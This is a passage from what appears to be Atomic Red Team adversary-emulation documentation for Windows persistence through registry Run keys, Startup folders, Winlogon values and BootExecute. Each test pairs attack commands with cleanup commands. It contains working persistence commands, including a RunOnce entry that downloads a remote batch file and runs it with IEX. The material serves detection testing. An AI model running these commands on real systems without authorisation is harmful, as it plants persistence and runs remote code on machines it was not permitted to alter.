REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1
Atomic Test #2 — Reg Key RunOnce
RunOnce Key Persistence.
Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout.
Supported Platforms: windows
auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| thing_to_execute | Thing to Run | path | C:\Path\AtomicRedTeam.dll |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
Cleanup Commands:
1
2
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f >nul 2>&1
Atomic Test #3 — PowerShell Registry RunOnce
RunOnce Key Persistence via PowerShell
Upon successful execution, a new entry will be added to the runonce item in the registry.
Supported Platforms: windows
auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| thing_to_execute | Thing to Run | path | powershell.exe |
| reg_key_path | Path to registry key to update | path | HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
$RunOnceKey = "#{reg_key_path}"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
Cleanup Commands:
1
2
Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
Atomic Test #4 — Suspicious vbs file run from startup Folder
vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, «T1547.001 Hello, World VBS!» will be displayed twice.
Additionally, the new files can be viewed in the «$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup»
folder and will also run when the computer is restarted and the user logs in.
Supported Platforms: windows
auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
Copy-Item "$PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
Copy-Item "$PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
Cleanup Commands:
1
2
3
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
Atomic Test #5 — Suspicious jse file run from startup Folder
jse files can be placed in and ran from the startup folder to maintain persistance.
Upon execution, «T1547.001 Hello, World JSE!» will be displayed twice.
Additionally, the new files can be viewed in the «$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup»
folder and will also run when the computer is restarted and the user logs in.
Supported Platforms: windows
auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
Copy-Item "$PathToAtomicsFolder\T1547.001\src\jsestartup.jse" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
Copy-Item "$PathToAtomicsFolder\T1547.001\src\jsestartup.jse" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
Cleanup Commands:
1
2
3
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore
Atomic Test #6 — Suspicious bat file run from startup Folder
bat files can be placed in and executed from the startup folder to maintain persistance
Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the «$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup»
folder and will also run when the computer is restarted and the user logs in.
Supported Platforms: windows
auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
Copy-Item "$PathToAtomicsFolder\T1547.001\src\batstartup.bat" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Copy-Item "$PathToAtomicsFolder\T1547.001\src\batstartup.bat" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Cleanup Commands:
1
2
3
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore
Atomic Test #7 — Add Executable Shortcut Link to User Startup Folder
Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists.
Supported Platforms: windows
auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
6
$Target = "C:\Windows\System32\calc.exe"
$ShortcutLocation = "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Create = $WScriptShell.CreateShortcut($ShortcutLocation)
$Create.TargetPath = $Target
$Create.Save()
Cleanup Commands:
1
Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
Atomic Test #8 — Add persistance via Recycle bin
Add a persistance via Recycle bin vxunderground
User have to clic on the recycle bin to lauch the payload (here calc)
Supported Platforms: windows
auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
Inputs:
None
Attack Commands: Run with command_prompt!
1
reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f
Cleanup Commands:
1
reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
Atomic Test #9 — SystemBC Malware-as-a-Service Registry
This Atomic will create a registry key called socks5_powershell for persistance access
https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
Supported Platforms: windows
auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| reg_key_value | Thing to Run | path | powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File |
| reg_key_path | Path to registry key to update | path | HKCU:\Software\Microsoft\Windows\CurrentVersion\Run |
Attack Commands: Run with powershell!
1
2
3
$RunKey = "#{reg_key_path}"
Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
Cleanup Commands:
1
2
Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore
Atomic Test #10 — Change Startup Folder — HKLM Modify User Shell Folders Common Startup Value
This test will modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V «Common Startup»
value to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart
Supported Platforms: windows
auto_generated_guid: acfef903-7662-447e-a391-9c91c2f00f7b
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| new_startup_folder | new startup folder to replace standard one | string | $env:TMP\atomictest\ |
| payload | executable to be placed in new startup location | string | C:\Windows\System32\calc.exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
New-Item -ItemType Directory -path "#{new_startup_folder}"
Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "#{new_startup_folder}"
Cleanup Commands:
1
2
3
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"
Remove-Item "#{new_startup_folder}" -Recurse -Force
Atomic Test #11 — Change Startup Folder — HKCU Modify User Shell Folders Startup Value
This test will modify the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V «Startup» value
to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart
Supported Platforms: windows
auto_generated_guid: 8834b65a-f808-4ece-ad7e-2acdf647aafa
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| new_startup_folder | new startup folder to replace standard one | string | $env:TMP\atomictest\ |
| payload | executable to be placed in new startup location | string | C:\Windows\System32\calc.exe |
Attack Commands: Run with powershell!
1
2
3
4
New-Item -ItemType Directory -path "#{new_startup_folder}"
Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}"
Cleanup Commands:
1
2
3
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
Remove-Item "#{new_startup_folder}" -Recurse -Force
Atomic Test #12 — HKCU — Policy Settings Explorer Run Key
This test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run to launch calc.exe on boot.
*Requires reboot
Supported Platforms: windows
auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| target_key_value_name | registry value to crate on target key | string | atomictest |
| payload | payload to execute | string | C:\Windows\System32\calc.exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
New-Item -ItemType Key -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
}
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
Cleanup Commands:
1
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}"
Atomic Test #13 — HKLM — Policy Settings Explorer Run Key
This test will create a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run key value to launch calc.exe on boot.
*Requires reboot
Supported Platforms: windows
auto_generated_guid: b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| target_key_value_name | registry value to crate on target key | string | atomictest |
| payload | payload to execute | string | C:\Windows\System32\calc.exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
New-Item -ItemType Key -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
}
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
Cleanup Commands:
1
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}"
Atomic Test #14 — HKLM — Append Command to Winlogon Userinit KEY Value
This test will append a command to the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value to launch calc.exe on boot.
- Requires reboot
Supported Platforms: windows
auto_generated_guid: f7fab6cc-8ece-4ca7-a0f1-30a22fccd374
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| payload | what to run | string | C:\Windows\System32\calc.exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit-backup" -Value "$oldvalue";
$newvalue = $oldvalue + " #{payload}";
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$newvalue"
Cleanup Commands:
1
2
3
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Userinit-backup');
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$oldvalue";
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Userinit-backup'
Atomic Test #15 — HKLM — Modify default System Shell — Winlogon Shell KEY Value
This test change the default value of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell from «explorer.exe» to the full path of «C:\Windows\explorer.exe»
to log a change to the key’s default value without breaking boot sequence.
An atacker will alternatively replace this with a custom shell.
Supported Platforms: windows
auto_generated_guid: 1d958c61-09c6-4d9e-b26b-4130314e520e
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| payload | what to run | string | C:\Windows\explorer.exe |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
4
5
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell-backup" -Value "$oldvalue";
$newvalue = $oldvalue + ", #{payload}";
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$newvalue"
Cleanup Commands:
1
2
3
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup');
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$oldvalue";
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
Atomic Test #16 — secedit used to create a Run key in the HKLM Hive
secedit allows to manipulate the HKLM hive of the Windows registry. This test creates a Run key with the keyname calc having calc.exe as the value in the HKLM hive.
Reference
Supported Platforms: windows
auto_generated_guid: 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| ini_file | INI config template | string | $PathToAtomicsFolder\T1547.001\src\regtemplate.ini |
| secedit_db | Custom secedit db | string | mytemplate.db |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
3
secedit /import /db #{secedit_db} /cfg "#{ini_file}"
secedit /configure /db #{secedit_db}
Cleanup Commands:
1
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "calc" /f >nul 2>&1
Atomic Test #17 — Modify BootExecute Value
This test modifies the BootExecute registry value to «autocheck autoche *», which can be used to simulate an adversary’s attempt to tamper with the system’s boot process.
Reference — https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf
NOTE that by not saving the correct value, you may inhibit your system from booting properly. Only run on a test system. There is a reg export before running the Atomic.
Supported Platforms: windows
auto_generated_guid: befc2b40-d487-4a5a-8813-c11085fb5672
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| registry_value | Registry value to set | string | autocheck autoche * |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
if (!(Test-Path "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg")) { reg.exe export "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager" "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg" /y }
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager" -Name "BootExecute" -Value "#{registry_value}" -Type MultiString
Cleanup Commands:
1
2
3
reg.exe import "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg"
Remove-Item -Path "$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg" -Force
source